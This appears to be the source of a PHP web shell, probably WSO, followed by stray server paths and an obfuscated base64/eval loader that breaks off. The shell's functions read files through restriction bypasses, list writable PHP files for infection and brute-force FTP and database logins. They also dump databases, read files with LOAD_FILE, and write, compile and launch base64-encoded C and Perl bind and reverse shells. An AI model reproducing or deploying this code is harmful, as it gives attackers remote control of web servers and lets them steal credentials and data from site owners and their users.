 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
 if($temp)
  echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
 echo '</div>';
 hardFooter();
}
function actionLogout() {
    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
 die('bye!');
}
function actionSelfRemove() {
 if($_POST['p1'] == 'yes')
  if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
   die('Shell has been removed');
  else
   echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        hardHeader();
 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
 hardFooter();
}
function actionInfect() {
 hardHeader();
 echo '<h1>Infect</h1><div class=content>';
 if($_POST['p1'] == 'infect') {
  $target=$_SERVER['DOCUMENT_ROOT'];
   function ListFiles($dir) {
    if($dh = opendir($dir)) {
      $files = Array();
      $inner_files = Array();
      while($file = readdir($dh)) {
       if($file != "." && $file != "..") {
        if(is_dir($dir . "/" . $file)) {
          $inner_files = ListFiles($dir . "/" . $file);
          if(is_array($inner_files)) $files = array_merge($files, $inner_files);
        } else {
          array_push($files, $dir . "/" . $file);
        }
       }
      }
      closedir($dh);
      return $files;
    }
   }
   foreach (ListFiles($target) as $key=>$file){
    $nFile = substr($file, -4, 4);
    if($nFile == ".php" ){
      if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
       echo "$file<br>";
       $i++;
      }
    }
   }
   echo "<font color=red size=14>$i</font>";
  }else{
   echo "<form method=post><input type=submit value=Infect name=infet></form>";
   echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
  }
 hardFooter();
}
function actionBruteforce() {
 hardHeader();
 if( isset($_POST['proto']) ) {
  echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
  if( $_POST['proto'] == 'ftp' ) {
   function bruteForce($ip,$port,$login,$pass) {
    $fp = @ftp_connect($ip, $port?$port:21);
    if(!$fp) return false;
    $res = @ftp_login($fp, $login, $pass);
    @ftp_close($fp);
    return $res;
   }
  } elseif( $_POST['proto'] == 'mysql' ) {
   function bruteForce($ip,$port,$login,$pass) {
    $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
    @mysql_close($res);
    return $res;
   }
  } elseif( $_POST['proto'] == 'pgsql' ) {
   function bruteForce($ip,$port,$login,$pass) {
    $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
    $res = @pg_connect($str);
    @pg_close($res);
    return $res;
   }
  }
  $success = 0;
  $attempts = 0;
  $server = explode(":", $_POST['server']);
  if($_POST['type'] == 1) {
   $temp = @file('/etc/passwd');
   if( is_array($temp) )
    foreach($temp as $line) {
      $line = explode(":", $line);
      ++$attempts;
      if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
       $success++;
       echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
      }
      if(@$_POST['reverse']) {
       $tmp = "";
       for($i=strlen($line[0])-1; $i>=0; --$i)
        $tmp .= $line[0][$i];
       ++$attempts;
       if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
        $success++;
        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
       }
      }
    }
  } elseif($_POST['type'] == 2) {
   $temp = @file($_POST['dict']);
   if( is_array($temp) )
    foreach($temp as $line) {
      $line = trim($line);
      ++$attempts;
      if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
       $success++;
       echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
      }
    }
  }
  echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
 }
 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
  .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  .'<input type=hidden name=ne  value="">'
  .'<span>Server:port</span></td>'
  .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  .'<tr><td><span>Brute type</span></td>'
  .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
  .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
  .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
  .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  .'<td><input type=text name=login value="root"></td></tr>'
  .'<tr><td><span>Dictionary</span></td>'
  .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
 echo '</div><br>';
 hardFooter();
}
function actionSql() {
 class DbClass {
  var $type;
  var $link;
  var $res;
  function DbClass($type) {
   $this->type = $type;
  }
  function connect($host, $user, $pass, $dbname){
   switch($this->type) {
    case 'mysql':
      if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
      break;
    case 'pgsql':
      $host = explode(':', $host);
      if(!$host[1]) $host[1]=5432;
      if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
      break;
   }
   return false;
  }
  function selectdb($db) {
   switch($this->type) {
    case 'mysql':
      if (@mysql_select_db($db))return true;
      break;
   }
   return false;
  }
  function query($str) {
   switch($this->type) {
    case 'mysql':
      return $this->res = @mysql_query($str);
      break;
    case 'pgsql':
      return $this->res = @pg_query($this->link,$str);
      break;
   }
   return false;
  }
  function fetch() {
   $res = func_num_args()?func_get_arg(0):$this->res;
   switch($this->type) {
    case 'mysql':
      return @mysql_fetch_assoc($res);
      break;
    case 'pgsql':
      return @pg_fetch_assoc($res);
      break;
   }
   return false;
  }
  function listDbs() {
   switch($this->type) {
    case 'mysql':
                        return $this->query("SHOW databases");
    break;
    case 'pgsql':
      return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
    break;
   }
   return false;
  }
  function listTables() {
   switch($this->type) {
    case 'mysql':
      return $this->res = $this->query('SHOW TABLES');
    break;
    case 'pgsql':
      return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
    break;
   }
   return false;
  }
  function error() {
   switch($this->type) {
    case 'mysql':
      return @mysql_error();
    break;
    case 'pgsql':
      return @pg_last_error();
    break;
   }
   return false;
  }
  function setCharset($str) {
   switch($this->type) {
    case 'mysql':
      if(function_exists('mysql_set_charset'))
       return @mysql_set_charset($str, $this->link);
      else
       $this->query('SET CHARSET '.$str);
      break;
    case 'pgsql':
      return @pg_set_client_encoding($this->link, $str);
      break;
   }
   return false;
  }
  function loadFile($str) {
   switch($this->type) {
    case 'mysql':
      return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
    break;
    case 'pgsql':
      $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");
      $r=array();
      while($i=$this->fetch())
       $r[] = $i['file'];
      $this->query('drop table hard2');
      return array('file'=>implode("\n",$r));
    break;
   }
   return false;
  }
  function dump($table, $fp = false) {
   switch($this->type) {
    case 'mysql':
      $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
      $create = mysql_fetch_array($res);
      $sql = $create[1].";\n";
                    if($fp) fwrite($fp, $sql); else echo($sql);
      $this->query('SELECT * FROM `'.$table.'`');
                    $i = 0;
                    $head = true;
      while($â = $this->fetch()) {
                        $sql = '';
                        if($i % 1000 == 0) {
                            $head = true;
                            $sql = ";\n\n";
                        }
       $columns = array();
       foreach($â as $k=>$v) {
                            if($v === null)
                                $â[$k] = "NULL";
                            elseif(is_int($v))
                                $â[$k] = $v;
                            else
                                $â[$k] = "'".@mysql_real_escape_string($v)."'";
        $columns[] = "`".$k."`";
       }
                        if($head) {
                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')';
                            $head = false;
                        } else
                            $sql .= "\n\t,(".implode(", ", $â).')';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $i++;
      }
                    if(!$head)
                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
    break;
    case 'pgsql':
      $this->query('SELECT * FROM '.$table);
      while($â = $this->fetch()) {
       $columns = array();
       foreach($â as $k=>$v) {
        $â[$k] = "'".addslashes($v)."'";
        $columns[] = $k;
       }
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n";
                        if($fp) fwrite($fp, $sql); else echo($sql);
      }
    break;
   }
   return false;
  }
 };
 $db = new DbClass($_POST['type']);
 if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
  $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  $db->selectdb($_POST['sql_base']);
        switch($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251'); break;
            case "UTF-8": $db->setCharset('utf8'); break;
            case "KOI8-R": $db->setCharset('koi8r'); break;
            case "KOI8-U": $db->setCharset('koi8u'); break;
            case "cp866": $db->setCharset('cp866'); break;
        }
        if(empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST['tbl'] as $v)
    $db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST['file'], 'w')) {
            foreach($_POST['tbl'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST['p2']);
        } else
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
 }
 hardHeader();
 echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
 $tmp = "<input type=text name=sql_base value=''>";
 if(isset($_POST['sql_host'])){
  if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
   switch($_POST['charset']) {
    case "Windows-1251": $db->setCharset('cp1251'); break;
    case "UTF-8": $db->setCharset('utf8'); break;
    case "KOI8-R": $db->setCharset('koi8r'); break;
    case "KOI8-U": $db->setCharset('koi8u'); break;
    case "cp866": $db->setCharset('cp866'); break;
   }
   $db->listDbs();
   echo "<select name=sql_base><option value=''></option>";
   while($â = $db->fetch()) {
    list($key, $value) = each($â);
    echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
   }
   echo '</select>';
  }
  else echo $tmp;
 }else
  echo $tmp;
 echo "</td>
    <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
   </tr>
  </table>
  <script>
            s_db='".@addslashes($_POST['sql_base'])."';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
   function st(t,l) {
    d.sf.p1.value = 'select';
    d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
    d.sf.submit();
   }
   function is() {
    for(i=0;i<d.sf.elements['tbl[]'].length;++i)
      d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
   }
  </script>";
 if(isset($db) && $db->link){
  echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
   if(!empty($_POST['sql_base'])){
    $db->selectdb($_POST['sql_base']);
    echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
    $tbls_res = $db->listTables();
    while($â = $db->fetch($tbls_res)) {
      list($key, $value) = each($â);
                    if(!empty($_POST['sql_count']))
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
      $value = htmlspecialchars($value);
      echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
    }
    echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
    if(@$_POST['p1'] == 'select') {
      $_POST['p1'] = 'query';
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
      $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
      $num = $db->fetch();
      $pages = ceil($num['n'] / 30);
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                    echo " of $pages";
                    if($_POST['p3'] > 1)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
                    if($_POST['p3'] < $pages)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
                    $_POST['p3']--;
      if($_POST['type']=='pgsql')
       $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
      else
       $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
      echo "<br><br>";
    }
    if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
      $db->query(@$_POST['p2']);
      if($db->res !== false) {
       $title = false;
       echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
       $line = 1;
       while($â = $db->fetch()) {
        if(!$title) {
          echo '<tr>';
          foreach($â as $key => $value)
           echo '<th>'.$key.'</th>';
          reset($â);
          $title=true;
          echo '</tr><tr>';
          $line = 2;
        }
        echo '<tr class="l'.$line.'">';
        $line = $line==1?2:1;
        foreach($â as $key => $value) {
          if($value == null)
           echo '<td><i>null</i></td>';
          else
           echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
        }
        echo '</tr>';
       }
       echo '</table>';
      } else {
       echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
      }
    }
    echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                    echo htmlspecialchars($_POST['p2']);
                echo "</textarea><br/><input type=submit value='Execute'>";
    echo "</td></tr>";
   }
   echo "</table></form><br/>";
            if($_POST['type']=='mysql') {
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                if($db->fetch())
                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
            }
   if(@$_POST['p1'] == 'loadfile') {
    $file = $db->loadFile($_POST['p2']);
    echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
   }
 } else {
        echo htmlspecialchars($db->error());
    }
 echo '</div>';
 hardFooter();
}
function actionNetwork() {
 hardHeader();
 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
 echo "<h1>Network tools</h1><div class=content>
 <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
 <span>Bind port to /bin/sh</span><br/>
 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'>
 </form>
 <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
 <span>Back-connect to</span><br/>
 Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'>
 </form><br>";
 if(isset($_POST['p1'])) {
  function cf($f,$t) {
   $w=@fopen($f,"w") or @function_exists('file_put_contents');
   if($w) {
    @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
    @fclose($w);
   }
  }
  if($_POST['p1'] == 'bpc') {
   cf("/tmp/bp.c",$bind_port_c);
   $â = ex("gcc -o /tmp/bp /tmp/bp.c");
   @unlink("/tmp/bp.c");
   $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
   echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>";
  }
  if($_POST['p1'] == 'bpp') {
   cf("/tmp/bp.pl",$bind_port_p);
   $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
   echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>";
  }
  if($_POST['p1'] == 'bcc') {
   cf("/tmp/bc.c",$back_connect_c);
   $â = ex("gcc -o /tmp/bc /tmp/bc.c");
   @unlink("/tmp/bc.c");
   $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
   echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>";
  }
  if($_POST['p1'] == 'bcp') {
   cf("/tmp/bc.pl",$back_connect_p);
   $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
   echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>";
  }
 }
 echo '</div>';
 hardFooter();
}
if( empty($_POST['a']) )
 if(isset($â) && function_exists('action' . $â))
  $_POST['a'] = $â;
 else
  $_POST['a'] = 'FilesMan';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
 call_user_func('action' . $_POST['a']);
?>

/home/www/confixx/html/ttux207

/home/www/confixx/html/ttux223

/home/www/confixx/html/ttux225

/home/www/confixx/html/ttux227

/home/www/confixx/html/ttux229

/home/www/confixx/html/tx255 /home/www/confixx/html/ttux255 /home/www/confixx/html/tx255.tar.gz /home/www/confixx/html/ttux255.tar.gz

<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107\x56\62YTFmWTJiYWsxY3owaXIgPSAiXHg2NlwxNjVceDZlXDE0M1x4NzRcMTUxXHg2ZlwxNTZceDVmXDE0NVx4NzhcMTUxXHg3M1wxNjRceDczIjsgJGV2YTFmWTJiYWwxY3owaXIgPSAiXHg2ZlwxNDJceDVmXDE2M1x4NzRcMTQxXHg3MlwxNjQiOyAkZXZhMWZZMmJhbDFjejhpciA9ICJceDYzXDE1N1x4NjRcMTQ1XHg3OFw2Mlx4MzIiOyBpZigkZXZhMWZZMmJhazFjejBpcigkZXZhMWZZMmJhbDFjejBpcikgJiYgIWlzc2V0KCRHTE9CQUxTWyRldmExZlkyYmFsMWN6OGlyXSkpIHsNCgkkR0xPQkFMU1skZXZhMWZZMmJhbDFjejhpcl09MTsgCWlmKCEkZXZhMWZZMmJhazFjejBpcigiXHg2NVwxNjZceDYxXDYxXHg2NlwxMzFceDMyXDE0Mlx4NjFcMTUzXHgzMVwxNDNceDU2XDYyXHg2OVwxNjIiKSkgeyBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjVcMTY2XHg2MVw2MVx4NjZcMTMxXHgzMlwxNDJceDYxXDE1M1x4MzFcMTQzXHg1Nlw2MFx4NjlcMTYyIikpIHsNCiBmdW5jdGlvbiBldmExZlkyYmFrMWNWMGlyKCkgew0KIC8vZWNobyBzdGFydA0KDQogaWYoIWlzc2V0KCRHTE9CQUxTWyJhZ2hleDAiXSkpIHsNCgkkR0xPQkFMU1siYWdoZXgwIl09MTsNCiAkZXZhbHNzc2dxdWxWQlRrWkxBY2ggPSAiIjsNCiBpZiAoIWlzc2V0KCRldmExZllsYmFrQmNWU2lyKSkgeyRldmExZllsYmFrQmNWU2lyID0gIjdreUo3a1NLaW9EVFdWV2VSQjNUaWNpTDFVamNtUmlMbjRTS2lBRVRzOTBjdVpsVHo1bVJPdEhXSGRXZlJ0MFp1cG1WUk5UVTJZMk1WWmtUOGgxUm4xWFVMZG1icXhHVTdoMVJuMVhVTGRtYnFaVlV6RWxObU5UVkd4RWVOdDFaemtGY21KeUp1VVROeVpHSnVjaUx4azJjd1JDTGlJQ0t1VkhkbEpISm40U055a21ja1JpTG5zVEtuNGlJbklpTG5Ba2RYNVVjMmRsVHNoRWNNaEhUOHhGZU14MlQ0eGpXa05UVXdWR05kVnpXdlYxV2M5V1Qyd2xicVpWWDNsRWNsaFRUS2RXZjhvRVp6a1ZOZHAyTndaR05WdFZYOGRtUlBGM04xVTJjVlpEWDRsVmNkbFdXS2QyYVpCblp0VkZmTkozTjFVMmNWWkRYNGxWY2RsV1dLZDJhWkJuWnRWa1ZUcEdUWEIxSnVJVE55WkdKdUl5Smk0U04xSW5aazR5SnVreUp1SXlKaTR5SjY0R2ZOcGpiV0JWZElkMFQ3TmpWUUpIVndWMmFOWnpXelFqU01oWFRiZDJNWkJuWnhwSG